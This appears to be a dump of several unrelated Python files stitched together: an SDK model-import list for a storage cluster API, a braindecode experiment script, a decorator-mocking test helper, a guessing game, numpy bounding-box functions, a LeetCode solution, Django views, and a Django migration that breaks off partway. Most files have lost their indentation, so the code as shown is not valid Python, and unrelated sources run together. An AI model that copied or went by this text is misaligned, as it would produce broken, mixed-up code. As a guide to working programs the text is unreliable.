from .auth_role_extended import AuthRoleExtended
from .auth_roles import AuthRoles
from .auth_roles_extended import AuthRolesExtended
from .auth_shells import AuthShells
from .auth_user import AuthUser
from .auth_user_create_params import AuthUserCreateParams
from .auth_user_extended import AuthUserExtended
from .auth_users import AuthUsers
from .auth_users_extended import AuthUsersExtended
from .auth_wellknowns import AuthWellknowns
from .changelist_lins import ChangelistLins
from .changelist_lins_ctime import ChangelistLinsCtime
from .changelist_lins_extended import ChangelistLinsExtended
from .cloud_account import CloudAccount
from .cloud_account_create_params import CloudAccountCreateParams
from .cloud_account_extended import CloudAccountExtended
from .cloud_accounts import CloudAccounts
from .cloud_accounts_extended import CloudAccountsExtended
from .cloud_job import CloudJob
from .cloud_job_create_params import CloudJobCreateParams
from .cloud_job_extended import CloudJobExtended
from .cloud_job_files import CloudJobFiles
from .cloud_job_files_name import CloudJobFilesName
from .cloud_job_job_engine_job import CloudJobJobEngineJob
from .cloud_jobs import CloudJobs
from .cloud_jobs_extended import CloudJobsExtended
from .cloud_jobs_files import CloudJobsFiles
from .cloud_pool import CloudPool
from .cloud_pool_create_params import CloudPoolCreateParams
from .cloud_pool_extended import CloudPoolExtended
from .cloud_pools import CloudPools
from .cloud_pools_extended import CloudPoolsExtended
from .cloud_settings import CloudSettings
from .cloud_settings_settings import CloudSettingsSettings
from .cloud_settings_settings_sleep_timeout_archive import CloudSettingsSettingsSleepTimeoutArchive
from .cluster_config import ClusterConfig
from .cluster_config_device import ClusterConfigDevice
from .cluster_config_onefs_version import ClusterConfigOnefsVersion
from .cluster_config_timezone import ClusterConfigTimezone
from .cluster_identity import ClusterIdentity
from .cluster_identity_logon import ClusterIdentityLogon
from .cluster_statfs import ClusterStatfs
from .cluster_time import ClusterTime
from .compatibilities_class_active import CompatibilitiesClassActive
from .compatibilities_class_active_active_item import CompatibilitiesClassActiveActiveItem
from .compatibilities_class_active_extended import CompatibilitiesClassActiveExtended
from .compatibilities_class_active_item import CompatibilitiesClassActiveItem
from .compatibilities_class_available import CompatibilitiesClassAvailable
from .compatibilities_class_available_available_item import CompatibilitiesClassAvailableAvailableItem
from .compatibilities_ssd_active import CompatibilitiesSsdActive
from .compatibilities_ssd_active_active_item import CompatibilitiesSsdActiveActiveItem
from .compatibilities_ssd_active_extended import CompatibilitiesSsdActiveExtended
from .compatibilities_ssd_active_item import CompatibilitiesSsdActiveItem
from .compatibilities_ssd_available import CompatibilitiesSsdAvailable
from .compatibilities_ssd_available_available_item import CompatibilitiesSsdAvailableAvailableItem
from .create_cloud_account_response import CreateCloudAccountResponse
from .create_cloud_job_response import CreateCloudJobResponse
from .create_cloud_pool_response import CreateCloudPoolResponse
from .create_compatibilities_class_active_item_response import CreateCompatibilitiesClassActiveItemResponse
from .create_compatibilities_class_active_item_response_merge import CreateCompatibilitiesClassActiveItemResponseMerge
from .create_compatibilities_class_active_item_response_split import CreateCompatibilitiesClassActiveItemResponseSplit
from .create_filepool_policy_response import CreateFilepoolPolicyResponse
from .create_job_job_response import CreateJobJobResponse
from .create_nfs_aliase_response import CreateNfsAliaseResponse
from .create_quota_report_response import CreateQuotaReportResponse
from .create_response import CreateResponse
from .create_snapshot_aliase_response import CreateSnapshotAliaseResponse
from .create_snapshot_lock_response import CreateSnapshotLockResponse
from .create_snapshot_schedule_response import CreateSnapshotScheduleResponse
from .create_storagepool_nodepool_response import CreateStoragepoolNodepoolResponse
from .create_sync_reports_rotate_item_response import CreateSyncReportsRotateItemResponse
from .debug_stats import DebugStats
from .debug_stats_handler import DebugStatsHandler
from .debug_stats_unknown import DebugStatsUnknown
from .dedupe_dedupe_summary import DedupeDedupeSummary
from .dedupe_dedupe_summary_summary import DedupeDedupeSummarySummary
from .dedupe_report import DedupeReport
from .dedupe_report_extended import DedupeReportExtended
from .dedupe_reports import DedupeReports
from .dedupe_reports_extended import DedupeReportsExtended
from .dedupe_settings import DedupeSettings
from .dedupe_settings_extended import DedupeSettingsExtended
from .dedupe_settings_settings import DedupeSettingsSettings
from .empty import Empty
from .error import Error
from .event_event import EventEvent
from .event_events import EventEvents
from .event_events_extended import EventEventsExtended
from .filepool_default_policy import FilepoolDefaultPolicy
from .filepool_default_policy_action import FilepoolDefaultPolicyAction
from .filepool_default_policy_default_policy import FilepoolDefaultPolicyDefaultPolicy
from .filepool_default_policy_default_policy_action import FilepoolDefaultPolicyDefaultPolicyAction
from .filepool_default_policy_extended import FilepoolDefaultPolicyExtended
from .filepool_policies import FilepoolPolicies
from .filepool_policy import FilepoolPolicy
from .filepool_policy_action import FilepoolPolicyAction
from .filepool_policy_action_create_params import FilepoolPolicyActionCreateParams
from .filepool_policy_create_params import FilepoolPolicyCreateParams
from .filepool_policy_extended import FilepoolPolicyExtended
from .filepool_policy_file_matching_pattern import FilepoolPolicyFileMatchingPattern
from .filepool_policy_file_matching_pattern_or_criteria_item import FilepoolPolicyFileMatchingPatternOrCriteriaItem
from .filepool_policy_file_matching_pattern_or_criteria_item_and_criteria_item import FilepoolPolicyFileMatchingPatternOrCriteriaItemAndCriteriaItem
from .filepool_templates import FilepoolTemplates
from .fsa_result import FsaResult
from .fsa_result_extended import FsaResultExtended
from .fsa_results import FsaResults
from .fsa_results_extended import FsaResultsExtended
from .fsa_settings import FsaSettings
from .fsa_settings_settings import FsaSettingsSettings
from .group_member import GroupMember
from .group_members import GroupMembers
from .hdfs_proxyuser import HdfsProxyuser
from .hdfs_proxyuser_create_params import HdfsProxyuserCreateParams
from .hdfs_proxyusers import HdfsProxyusers
from .hdfs_rack import HdfsRack
from .hdfs_rack_create_params import HdfsRackCreateParams
from .hdfs_rack_extended import HdfsRackExtended
from .hdfs_racks import HdfsRacks
from .hdfs_racks_extended import HdfsRacksExtended
from .hdfs_settings import HdfsSettings
from .hdfs_settings_settings import HdfsSettingsSettings
from .history_file import HistoryFile
from .history_file_statistic import HistoryFileStatistic
from .job_event import JobEvent
from .job_events import JobEvents
from .job_job import JobJob
from .job_job_changelistcreate_params import JobJobChangelistcreateParams
from .job_job_create_params import JobJobCreateParams
from .job_job_domainmark_params import JobJobDomainmarkParams
from .job_job_extended import JobJobExtended
from .job_job_prepair_params import JobJobPrepairParams
from .job_job_snaprevert_params import JobJobSnaprevertParams
from .job_job_summary import JobJobSummary
from .job_job_summary_summary import JobJobSummarySummary
from .job_jobs import JobJobs
from .job_jobs_extended import JobJobsExtended
from .job_policies import JobPolicies
from .job_policies_extended import JobPoliciesExtended
from .job_policies_type import JobPoliciesType
from .job_policy import JobPolicy
from .job_policy_create_params import JobPolicyCreateParams
from .job_policy_interval import JobPolicyInterval
from .job_report import JobReport
from .job_reports import JobReports
from .job_statistics import JobStatistics
from .job_statistics_job import JobStatisticsJob
from .job_statistics_job_node import JobStatisticsJobNode
from .job_statistics_job_node_cpu import JobStatisticsJobNodeCpu
from .job_statistics_job_node_io import JobStatisticsJobNodeIo
from .job_statistics_job_node_io_read import JobStatisticsJobNodeIoRead
from .job_statistics_job_node_io_write import JobStatisticsJobNodeIoWrite
from .job_statistics_job_node_memory import JobStatisticsJobNodeMemory
from .job_statistics_job_node_memory_physical import JobStatisticsJobNodeMemoryPhysical
from .job_statistics_job_node_memory_virtual import JobStatisticsJobNodeMemoryVirtual
from .job_statistics_job_node_worker import JobStatisticsJobNodeWorker
from .job_type import JobType
from .job_type_extended import JobTypeExtended
from .job_types import JobTypes
from .job_types_extended import JobTypesExtended
from .license_license import LicenseLicense
from .license_license_create_params import LicenseLicenseCreateParams
from .license_licenses import LicenseLicenses
from .mapping_identities import MappingIdentities
from .mapping_identity import MappingIdentity
from .mapping_identity_create_params import MappingIdentityCreateParams
from .mapping_identity_target import MappingIdentityTarget
from .mapping_identity_target_create_params import MappingIdentityTargetCreateParams
from .mapping_users_lookup import MappingUsersLookup
from .mapping_users_lookup_mapping_item import MappingUsersLookupMappingItem
from .mapping_users_lookup_mapping_item_group import MappingUsersLookupMappingItemGroup
from .mapping_users_lookup_mapping_item_user import MappingUsersLookupMappingItemUser
from .mapping_users_rules import MappingUsersRules
from .mapping_users_rules_extended import MappingUsersRulesExtended
from .mapping_users_rules_parameters import MappingUsersRulesParameters
from .mapping_users_rules_rule import MappingUsersRulesRule
from .mapping_users_rules_rule_extended import MappingUsersRulesRuleExtended
from .mapping_users_rules_rule_options import MappingUsersRulesRuleOptions
from .mapping_users_rules_rule_options_default_user import MappingUsersRulesRuleOptionsDefaultUser
from .mapping_users_rules_rule_options_extended import MappingUsersRulesRuleOptionsExtended
from .mapping_users_rules_rule_user2 import MappingUsersRulesRuleUser2
from .mapping_users_rules_rule_user2_extended import MappingUsersRulesRuleUser2Extended
from .mapping_users_rules_rules import MappingUsersRulesRules
from .mapping_users_rules_rules_parameters import MappingUsersRulesRulesParameters
from .nfs_aliase import NfsAliase
from .nfs_aliase_create_params import NfsAliaseCreateParams
from .nfs_aliase_extended import NfsAliaseExtended
from .nfs_aliases import NfsAliases
from .nfs_aliases_extended import NfsAliasesExtended
from .nfs_check import NfsCheck
from .nfs_check_extended import NfsCheckExtended
from .nfs_export import NfsExport
from .nfs_export_create_params import NfsExportCreateParams
from .nfs_export_extended import NfsExportExtended
from .nfs_export_map_all import NfsExportMapAll
from .nfs_export_map_all_secondary_groups import NfsExportMapAllSecondaryGroups
from .nfs_exports import NfsExports
from .nfs_exports_extended import NfsExportsExtended
from .nfs_exports_summary import NfsExportsSummary
from .nfs_exports_summary_summary import NfsExportsSummarySummary
from .nfs_nlm_locks import NfsNlmLocks
from .nfs_nlm_locks_lock import NfsNlmLocksLock
from .nfs_nlm_sessions import NfsNlmSessions
from .nfs_nlm_sessions_session import NfsNlmSessionsSession
from .nfs_nlm_waiters import NfsNlmWaiters
from .nfs_settings_export import NfsSettingsExport
from .nfs_settings_export_settings import NfsSettingsExportSettings
from .nfs_settings_global import NfsSettingsGlobal
from .nfs_settings_global_settings import NfsSettingsGlobalSettings
from .nfs_settings_zone import NfsSettingsZone
from .nfs_settings_zone_settings import NfsSettingsZoneSettings
from .providers_ads import ProvidersAds
from .providers_ads_ads_item import ProvidersAdsAdsItem
from .providers_ads_id_params import ProvidersAdsIdParams
from .providers_ads_item import ProvidersAdsItem
from .providers_file import ProvidersFile
from .providers_file_file_item import ProvidersFileFileItem
from .providers_file_id_params import ProvidersFileIdParams
from .providers_file_item import ProvidersFileItem
from .providers_krb5 import ProvidersKrb5
from .providers_krb5_extended import ProvidersKrb5Extended
from .providers_krb5_id_params import ProvidersKrb5IdParams
from .providers_krb5_id_params_keytab_entry import ProvidersKrb5IdParamsKeytabEntry
from .providers_krb5_item import ProvidersKrb5Item
from .providers_krb5_krb5_item import ProvidersKrb5Krb5Item
from .providers_krb5_krb5_item_extended import ProvidersKrb5Krb5ItemExtended
from .providers_ldap import ProvidersLdap
from .providers_ldap_id_params import ProvidersLdapIdParams
from .providers_ldap_item import ProvidersLdapItem
from .providers_ldap_ldap_item import ProvidersLdapLdapItem
from .providers_local import ProvidersLocal
from .providers_local_id_params import ProvidersLocalIdParams
from .providers_local_local_item import ProvidersLocalLocalItem
from .providers_nis import ProvidersNis
from .providers_nis_id_params import ProvidersNisIdParams
from .providers_nis_item import ProvidersNisItem
from .providers_nis_nis_item import ProvidersNisNisItem
from .providers_summary import ProvidersSummary
from .providers_summary_provider_instance import ProvidersSummaryProviderInstance
from .providers_summary_provider_instance_connection import ProvidersSummaryProviderInstanceConnection
from .quota_notification import QuotaNotification
from .quota_notification_create_params import QuotaNotificationCreateParams
from .quota_notification_extended import QuotaNotificationExtended
from .quota_notifications import QuotaNotifications
from .quota_notifications_extended import QuotaNotificationsExtended
from .quota_quota import QuotaQuota
from .quota_quota_create_params import QuotaQuotaCreateParams
from .quota_quota_extended import QuotaQuotaExtended
from .quota_quota_thresholds import QuotaQuotaThresholds
from .quota_quota_thresholds_extended import QuotaQuotaThresholdsExtended
from .quota_quota_usage import QuotaQuotaUsage
from .quota_quotas import QuotaQuotas
from .quota_quotas_extended import QuotaQuotasExtended
from .quota_quotas_summary import QuotaQuotasSummary
from .quota_quotas_summary_summary import QuotaQuotasSummarySummary
from .quota_reports import QuotaReports
from .remotesupport_connectemc import RemotesupportConnectemc
from .remotesupport_connectemc_connectemc import RemotesupportConnectemcConnectemc
from .report_about import ReportAbout
from .report_about_report import ReportAboutReport
from .report_subreport import ReportSubreport
from .report_subreports import ReportSubreports
from .report_subreports_extended import ReportSubreportsExtended
from .reports_report_subreports import ReportsReportSubreports
from .reports_report_subreports_extended import ReportsReportSubreportsExtended
from .reports_report_subreports_subreport import ReportsReportSubreportsSubreport
from .role_privileges import RolePrivileges
from .settings_access_time import SettingsAccessTime
from .settings_access_time_access_time_item import SettingsAccessTimeAccessTimeItem
from .settings_access_time_extended import SettingsAccessTimeExtended
from .settings_global import SettingsGlobal
from .settings_global_global_settings import SettingsGlobalGlobalSettings
from .settings_krb5_defaults import SettingsKrb5Defaults
from .settings_krb5_defaults_krb5_settings import SettingsKrb5DefaultsKrb5Settings
from .settings_krb5_domain import SettingsKrb5Domain
from .settings_krb5_domain_create_params import SettingsKrb5DomainCreateParams
from .settings_krb5_domains import SettingsKrb5Domains
from .settings_krb5_domains_domain import SettingsKrb5DomainsDomain
from .settings_krb5_domains_extended import SettingsKrb5DomainsExtended
from .settings_krb5_realm import SettingsKrb5Realm
from .settings_krb5_realm_create_params import SettingsKrb5RealmCreateParams
from .settings_mapping import SettingsMapping
from .settings_mapping_extended import SettingsMappingExtended
from .settings_mapping_extended_extended import SettingsMappingExtendedExtended
from .settings_mapping_mapping_settings import SettingsMappingMappingSettings
from .settings_mappings import SettingsMappings
from .settings_reports import SettingsReports
from .settings_reports_extended import SettingsReportsExtended
from .settings_reports_settings import SettingsReportsSettings
from .smb_openfile import SmbOpenfile
from .smb_openfiles import SmbOpenfiles
from .smb_session import SmbSession
from .smb_sessions import SmbSessions
from .smb_settings_global import SmbSettingsGlobal
from .smb_settings_global_settings import SmbSettingsGlobalSettings
from .smb_settings_global_settings_audit_global_sacl_item import SmbSettingsGlobalSettingsAuditGlobalSaclItem
from .smb_settings_share import SmbSettingsShare
from .smb_settings_share_settings import SmbSettingsShareSettings
from .smb_share import SmbShare
from .smb_share_create_params import SmbShareCreateParams
from .smb_share_extended import SmbShareExtended
from .smb_share_permission import SmbSharePermission
from .smb_shares import SmbShares
from .smb_shares_extended import SmbSharesExtended
from .smb_shares_summary import SmbSharesSummary
from .smb_shares_summary_summary import SmbSharesSummarySummary
from .snapshot_aliase import SnapshotAliase
from .snapshot_aliase_create_params import SnapshotAliaseCreateParams
from .snapshot_aliase_extended import SnapshotAliaseExtended
from .snapshot_aliases import SnapshotAliases
from .snapshot_aliases_extended import SnapshotAliasesExtended
from .snapshot_changelists import SnapshotChangelists
from .snapshot_changelists_extended import SnapshotChangelistsExtended
from .snapshot_lock import SnapshotLock
from .snapshot_lock_create_params import SnapshotLockCreateParams
from .snapshot_lock_extended import SnapshotLockExtended
from .snapshot_locks import SnapshotLocks
from .snapshot_locks_extended import SnapshotLocksExtended
from .snapshot_pending import SnapshotPending
from .snapshot_pending_pending_item import SnapshotPendingPendingItem
from .snapshot_repstates import SnapshotRepstates
from .snapshot_repstates_extended import SnapshotRepstatesExtended
from .snapshot_schedule import SnapshotSchedule
from .snapshot_schedule_create_params import SnapshotScheduleCreateParams
from .snapshot_schedule_extended import SnapshotScheduleExtended
from .snapshot_schedule_extended_extended import SnapshotScheduleExtendedExtended
from .snapshot_schedules import SnapshotSchedules
from .snapshot_schedules_extended import SnapshotSchedulesExtended
from .snapshot_settings import SnapshotSettings
from .snapshot_settings_extended import SnapshotSettingsExtended
from .snapshot_settings_settings import SnapshotSettingsSettings
from .snapshot_snapshot import SnapshotSnapshot
from .snapshot_snapshot_create_params import SnapshotSnapshotCreateParams
from .snapshot_snapshot_extended import SnapshotSnapshotExtended
from .snapshot_snapshots import SnapshotSnapshots
from .snapshot_snapshots_extended import SnapshotSnapshotsExtended
from .snapshot_snapshots_summary import SnapshotSnapshotsSummary
from .snapshot_snapshots_summary_summary import SnapshotSnapshotsSummarySummary
from .statistics_current import StatisticsCurrent
from .statistics_current_stat import StatisticsCurrentStat
from .statistics_history import StatisticsHistory
from .statistics_history_stat import StatisticsHistoryStat
from .statistics_history_stat_value import StatisticsHistoryStatValue
from .statistics_key import StatisticsKey
from .statistics_key_policy import StatisticsKeyPolicy
from .statistics_keys import StatisticsKeys
from .statistics_keys_extended import StatisticsKeysExtended
from .statistics_protocol import StatisticsProtocol
from .statistics_protocols import StatisticsProtocols
from .storagepool_nodepool import StoragepoolNodepool
from .storagepool_nodepool_create_params import StoragepoolNodepoolCreateParams
from .storagepool_nodepool_extended import StoragepoolNodepoolExtended
from .storagepool_nodepool_usage import StoragepoolNodepoolUsage
from .storagepool_nodepools import StoragepoolNodepools
from .storagepool_nodepools_extended import StoragepoolNodepoolsExtended
from .storagepool_settings import StoragepoolSettings
from .storagepool_settings_extended import StoragepoolSettingsExtended
from .storagepool_settings_settings import StoragepoolSettingsSettings
from .storagepool_settings_settings_spillover_target import StoragepoolSettingsSettingsSpilloverTarget
from .storagepool_settings_spillover_target import StoragepoolSettingsSpilloverTarget
from .storagepool_status import StoragepoolStatus
from .storagepool_status_unhealthy_item import StoragepoolStatusUnhealthyItem
from .storagepool_status_unhealthy_item_affected_item import StoragepoolStatusUnhealthyItemAffectedItem
from .storagepool_status_unhealthy_item_diskpool import StoragepoolStatusUnhealthyItemDiskpool
from .storagepool_status_unprovisioned_item import StoragepoolStatusUnprovisionedItem
from .storagepool_storagepool import StoragepoolStoragepool
from .storagepool_storagepools import StoragepoolStoragepools
from .storagepool_suggested_protection import StoragepoolSuggestedProtection
from .storagepool_suggested_protection_suggested_protection_item import StoragepoolSuggestedProtectionSuggestedProtectionItem
from .storagepool_tier import StoragepoolTier
from .storagepool_tier_create_params import StoragepoolTierCreateParams
from .storagepool_tier_extended import StoragepoolTierExtended
from .storagepool_tiers import StoragepoolTiers
from .storagepool_tiers_extended import StoragepoolTiersExtended
from .storagepool_unprovisioned import StoragepoolUnprovisioned
from .storagepool_unprovisioned_unprovisioned_item import StoragepoolUnprovisionedUnprovisionedItem
from .sync_job import SyncJob
from .sync_job_create_params import SyncJobCreateParams
from .sync_job_extended import SyncJobExtended
from .sync_job_phase import SyncJobPhase
from .sync_job_policy import SyncJobPolicy
from .sync_job_policy_file_matching_pattern import SyncJobPolicyFileMatchingPattern
from .sync_job_policy_file_matching_pattern_or_criteria_item import SyncJobPolicyFileMatchingPatternOrCriteriaItem
from .sync_job_policy_file_matching_pattern_or_criteria_item_and_criteria_item import SyncJobPolicyFileMatchingPatternOrCriteriaItemAndCriteriaItem
from .sync_job_worker import SyncJobWorker
from .sync_jobs import SyncJobs
from .sync_jobs_extended import SyncJobsExtended
from .sync_policies import SyncPolicies
from .sync_policies_extended import SyncPoliciesExtended
from .sync_policy import SyncPolicy
from .sync_policy_create_params import SyncPolicyCreateParams
from .sync_policy_extended import SyncPolicyExtended
from .sync_policy_extended_extended import SyncPolicyExtendedExtended
from .sync_policy_source_network import SyncPolicySourceNetwork
from .sync_report import SyncReport
from .sync_report_policy import SyncReportPolicy
from .sync_reports import SyncReports
from .sync_reports_extended import SyncReportsExtended
from .sync_reports_rotate import SyncReportsRotate
from .sync_rule import SyncRule
from .sync_rule_create_params import SyncRuleCreateParams
from .sync_rule_extended import SyncRuleExtended
from .sync_rule_extended_extended import SyncRuleExtendedExtended
from .sync_rule_schedule import SyncRuleSchedule
from .sync_rules import SyncRules
from .sync_rules_extended import SyncRulesExtended
from .sync_settings import SyncSettings
from .sync_settings_settings import SyncSettingsSettings
from .target_policies import TargetPolicies
from .target_policies_extended import TargetPoliciesExtended
from .target_policy import TargetPolicy
from .target_report import TargetReport
from .target_reports import TargetReports
from .target_reports_extended import TargetReportsExtended
from .user_change_password import UserChangePassword
from .user_member_of import UserMemberOf
from .worm_domain import WormDomain
from .worm_domain_create_params import WormDomainCreateParams
from .worm_domain_extended import WormDomainExtended
from .worm_domains import WormDomains
from .worm_domains_extended import WormDomainsExtended
from .worm_settings import WormSettings
from .worm_settings_extended import WormSettingsExtended
from .worm_settings_settings import WormSettingsSettings
from .zone import Zone
from .zone_create_params import ZoneCreateParams
from .zone_extended import ZoneExtended
from .zones import Zones
from .zones_summary import ZonesSummary
from .zones_summary_extended import ZonesSummaryExtended
from .zones_summary_summary import ZonesSummarySummary
from .zones_summary_summary_extended import ZonesSummarySummaryExtended
|
#!/usr/bin/env python
import numpy as np
import pickle
from glob import glob
from braindecode.experiments.load import load_model
from braindecode.experiments.experiment import create_experiment
import sys
import logging
log = logging.getLogger(__name__)
def update_result_to_new_iterator(basename):
exp = create_experiment(basename + '.yaml')
model = load_model(basename + '.pkl')
exp.final_layer = model
exp.setup()
datasets = exp.dataset_provider.get_train_merged_valid_test(exp.dataset)
exp.create_monitors(datasets)
exp.monitor_manager.monitor_epoch(exp.monitor_chans, datasets,
exp.iterator)
result = np.load(basename + '.result.pkl')
for set_name in ['train', 'valid', 'test']:
for chan_name in 'loss', 'sample_misclass':
full_chan_name = set_name + '_' + chan_name
assert np.allclose(result.monitor_channels[full_chan_name][-1],
exp.monitor_chans[full_chan_name][-1],
rtol=1e-3, atol=1e-3), (
"Not close: old {:f}, new: {:f}".format(result.monitor_channels[full_chan_name][-1],
exp.monitor_chans[full_chan_name][-1]))
for set_name in ['train', 'valid', 'test']:
full_chan_name = set_name + '_' + 'misclass'
result.monitor_channels[full_chan_name][-1] = exp.monitor_chans[full_chan_name][-1]
result_filename = basename + '.result.pkl'
pickle.dump(result, open(result_filename, 'w'))
if __name__ == '__main__':
start = int(sys.argv[1])
stop = int(sys.argv[2])
all_result_names = sorted(glob('data/models/paper/ours/cnt/shallow/*.result.pkl'),
key=lambda s:int(s.split('.result.pkl')[0].split('/')[-1]))
for i_result, result_name in enumerate(all_result_names[start:stop]):
log.info("Running {:d} of {:d}".format(i_result, len(all_result_names[start:stop])))
basename = result_name.replace('.result.pkl', '')
update_result_to_new_iterator(basename)
|
# -*- coding: utf-8 -*-
"""
Garland: for unwrapping decorators.
"""
__author__ = 'Ben Lopatin'
__email__ = 'ben@wellfire.co'
__version__ = '0.3.0'
import sys
import importlib
if sys.version_info.major == 3:
from importlib import reload # Common interface
from unittest.mock import patch
else:
from mock import patch
def mock_decorator(*a, **k):
"""
An pass-through decorator that returns the underlying function.
This is used as the default for replacing decorators.
"""
# This is a decorator without parameters, e.g.
#
# @login_required
# def some_view(request):
# ...
#
if a:
# This could fail in the instance where a callable argument is passed
# as a parameter to the decorator!
if callable(a[0]):
def wrapper(*args, **kwargs):
return a[0](*args, **kwargs)
return wrapper
# This is a decorator with parameters, e.g.
#
# @render_template("index.html")
# def some_view(request):
# ...
#
def real_decorator(function):
def wrapper(*args, **kwargs):
return function(*args, **kwargs)
return wrapper
return real_decorator
def tinsel(to_patch, module_name, decorator=mock_decorator):
"""
Decorator for simple in-place decorator mocking for tests
Args:
to_patch: the string path of the function to patch
module_name: complete string path of the module to reload
decorator (optional): replacement decorator. By default a pass-through
will be used.
Returns:
A wrapped test function, during the context of execution the specified
path is patched.
"""
def fn_decorator(function):
def wrapper(*args, **kwargs):
with patch(to_patch, decorator):
m = importlib.import_module(module_name)
reload(m)
function(*args, **kwargs)
reload(m)
return wrapper
return fn_decorator
|
## Guess Game 2.0
# The program will prompt the user to think of a number from 1-100. It will guess the user's
# number with provided feedback on whether their number is lower or higher than the guess.
import sys
def guessGame(ans, guess):
if ans[0] == "h" or ans[0] == "H":
offset = (guess[2] - guess[0]) // 2
guess[1] = guess[0]
guess[0] += offset
elif ans[0] == "l" or ans[0] == "L":
offset = (guess[0] - guess[1]) // 2
guess[2] = guess[0]
guess[0] -= offset
return guess
if __name__=="__main__":
print("----- GUESSING GAME 2.0 -----")
print("Welcome back! Gonna be guessing your number instead of you guessing mine." + '\n')
begin = str(input("Shall we begin? (Y/N): "))
if begin[0] == "y" or begin[0] == "Y":
ready = str(input('\n' + "Great! Think of a number between 1-100. Hit Enter when you've thought of one. "))
if ready == "":
correct = False
num_guesses = 0
# Tuple that stores the guess, the low boundary, and high boundary
guess = [50, 0, 100]
while not correct:
ans = str(input('\n' + "Is it " + str(guess[0]) + "? (Yes/Higher/Lower): "))
if ans[0] == "Y" or ans[0] == "y":
num_guesses +=1
print("Yay! I won after " + str(num_guesses) + " guesses.")
break
guess = guessGame(ans, guess)
num_guesses += 1
else:
print("Okay, maybe next time. Have a great day!" )
sys.exit()
|
import numpy as np
def get_bb(seg, do_count=False):
dim = len(seg.shape)
a=np.where(seg>0)
if len(a[0])==0:
return [-1]*dim*2
out=[]
for i in range(dim):
out+=[a[i].min(), a[i].max()]
if do_count:
out+=[len(a[0])]
return out
def get_bb_all2d(seg, do_count=False, uid=None):
sz = seg.shape
assert len(sz)==2
if uid is None:
uid = np.unique(seg)
uid = uid[uid>0]
if len(uid) == 0:
return np.zeros((1,5+do_count),dtype=np.uint32)
um = uid.max()
out = np.zeros((1+int(um),5+do_count),dtype=np.uint32)
out[:,0] = np.arange(out.shape[0])
out[:,1] = sz[0]
out[:,3] = sz[1]
# for each row
rids = np.where((seg>0).sum(axis=1)>0)[0]
for rid in rids:
sid = np.unique(seg[rid])
sid = sid[(sid>0)*(sid<=um)]
out[sid,1] = np.minimum(out[sid,1],rid)
out[sid,2] = np.maximum(out[sid,2],rid)
cids = np.where((seg>0).sum(axis=0)>0)[0]
for cid in cids:
sid = np.unique(seg[:,cid])
sid = sid[(sid>0)*(sid<=um)]
out[sid,3] = np.minimum(out[sid,3],cid)
out[sid,4] = np.maximum(out[sid,4],cid)
if do_count:
ui,uc = np.unique(seg,return_counts=True)
out[ui,-1]=uc
return out[uid]
def get_bb_all3d(seg,do_count=False, uid=None):
sz = seg.shape
assert len(sz)==3
if uid is None:
uid = seg
um = int(uid.max())
out = np.zeros((1+um,7+do_count),dtype=np.int32)
out[:,0] = np.arange(out.shape[0])
out[:,1] = sz[0]
out[:,2] = -1
out[:,3] = sz[1]
out[:,4] = -1
out[:,5] = sz[2]
out[:,6] = -1
# for each slice
zids = np.where((seg>0).sum(axis=1).sum(axis=1)>0)[0]
for zid in zids:
sid = np.unique(seg[zid])
sid = sid[(sid>0)*(sid<=um)]
out[sid,1] = np.minimum(out[sid,1],zid)
out[sid,2] = np.maximum(out[sid,2],zid)
# for each row
rids = np.where((seg>0).sum(axis=0).sum(axis=1)>0)[0]
for rid in rids:
sid = np.unique(seg[:,rid])
sid = sid[(sid>0)*(sid<=um)]
out[sid,3] = np.minimum(out[sid,3],rid)
out[sid,4] = np.maximum(out[sid,4],rid)
# for each col
cids = np.where((seg>0).sum(axis=0).sum(axis=0)>0)[0]
for cid in cids:
sid = np.unique(seg[:,:,cid])
sid = sid[(sid>0)*(sid<=um)]
out[sid,5] = np.minimum(out[sid,5],cid)
out[sid,6] = np.maximum(out[sid,6],cid)
if do_count:
ui,uc = np.unique(seg,return_counts=True)
out[ui[ui<=um],-1]=uc[ui<=um]
return out[np.all(out!=-1, axis=-1)].astype(np.uint32)
|
class Solution(object):
def getRow(self, rowIndex):
"""
https://leetcode.com/problems/pascals-triangle-ii/
"""
li = []
x = l = 1
for i in range(0, rowIndex+1):
li.append(x/l)
x *= (rowIndex-i)
l *= i+1
# li += li[0:rowIndex//2+rowIndex%2][::-1]
return li
|
from django.shortcuts import render
from .models import Article
from django.http import Http404, HttpResponseRedirect
from django.urls import reverse
def index(request):
latest_articles_list = Article.objects.order_by('-pub_date')[:5]
return render(request, 'articles/list.html', {'latest_articles_list': latest_articles_list})
def detail(request, article_id):
try:
a = Article.objects.get(id=article_id)
except:
raise Http404("Статья не найдена")
comment_list = a.comment_set.order_by('id')[:10]
return render(request, 'articles/detail.html', {'article': a, 'comment_list': comment_list})
def leave_comment(request, article_id):
try:
a = Article.objects.get(id=article_id)
except:
raise Http404("Статья не найдена")
a.comment_set.create(author_name = request.POST['name'], comment_text = request.POST['text'])
return HttpResponseRedirect( reverse('articles:detail', args=(a.id,)))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-08-29 20:46
from __future__ import unicode_literals
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Form_four_classes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Form_four_news_portal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('news_title', models.CharField(max_length=200)),
('news_description', models.TextField()),
('document_file', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Form_one_classes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
